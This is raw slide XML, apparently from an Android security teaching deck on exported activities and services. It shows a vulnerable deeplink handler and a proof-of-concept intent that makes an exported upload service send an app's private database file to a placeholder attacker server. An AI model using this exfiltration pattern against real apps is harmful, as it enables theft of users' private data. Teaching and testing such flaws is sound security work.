            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>getParcelableExtra</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"attacker_provided_data"</a:t>
            </a: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sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="999988"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// if deeplink does not equal null startActivity with intent provided by user</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">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if</a:t>
            </a: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deeplinkIntent</a:t>
            </a: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a:t>
            </a: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null</a:t>
            </a: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a:t>
            </a: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this.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>consumedDeeplinkIntent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>))</a:t>
            </a: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a:t>
            </a:r>
            <a:endParaRPr sz="14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400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>startActivity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>deeplinkIntent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="999988"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// starting an intent provided by a user</a:t>
            </a:r>
            <a:endParaRPr sz="14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rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>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a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p20"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access to Protected Intents via Exported Activities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950625"/>
            <a:ext cx="8520600" cy="40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Custom file upload service example that is vulnerable because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>android:exported=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"true"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>. When exported by third party applications can send data to the service or steal sensitive data from applications depending on the services function. Check if params and intent data can be set with proof of concept application.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        UploadTaskParameters</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params</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new</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UploadTaskParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        params</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>setId</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"1"</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params</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>setServerUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"https://your-server-receives-app-data.com"</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try</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params</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>addFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(new</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UploadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"/data/data/com.example/database/ohno.db"</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catch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FileNotFoundException</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e</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throw</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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>IllegalStateException</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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e</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i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="999988"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>//Here to satisfy try catch requirement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Intent</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intent</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new</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Intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"com.example.action.upload"</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>setClassName</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"com.example"</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lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"com.example.UploadService"</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>putExtra</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"httpTaskParameters"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>new</a:t>
            </a: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HttpUploadTaskParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="3333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n" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>startService</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-202650" y="198800"/>
            <a:ext cx="9549300" cy="638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     Exploitation of Android Services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